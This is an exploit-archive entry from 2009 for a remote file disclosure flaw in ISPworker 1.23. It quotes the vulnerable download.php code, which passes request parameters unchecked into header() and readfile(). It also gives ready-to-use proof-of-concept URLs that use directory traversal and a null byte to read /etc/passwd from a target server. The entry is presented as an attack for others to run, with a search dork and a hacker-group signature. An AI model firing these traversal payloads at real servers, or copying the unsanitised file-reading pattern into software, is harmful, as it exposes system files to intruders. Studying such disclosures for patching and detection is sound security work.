[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : ISPworker <= 1.23 Remote File Disclosure exploit
# Published : 2009-12-01
# Author : cr4wl3r
# Previous Title : Dotdefender Remote Command Execution 3.8-5
# Next Title : Quate CMS <= 0.3.5 (RFI/LFI) Multiple Remote Vulnerabilities


[ Discovered by cr4wl3r  cr4wl3r[4t]linuxmail[dot]org ]



########################################################################

#ISPworker <= 1.23 Remote File Disclosure exploit

#Download Script      :  http://www.ispware.de/_files/ispworker-1.23.tar.gz

#Dork                 :  die("lamers attempt");  :P

########################################################################

#

#Vuln : ./ispworker-1.23/files/ispworker/module/ticket/download.php 

#

#       <?header('Content-type: '.$_REQUEST[type]);

#        header('Content-Disposition: attachment; filename="'.$_REQUEST[filename].'"');

#        readfile("./tmp/$ticketid"."_".$_REQUEST[filename]);

#       ?>

#

#PoC  :  http://[target]/[path]/module/ticket/download.php?ticketid=../../../../../../../../../etc/passwd%00

#        http://[target]/[path]/module/ticket/download.php?filename=../../../../../../../../../etc/passwd

#

########################################################################

########################################################################

####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################

########################################################################

########################################################################



   [ Gorontalo / 2009 ]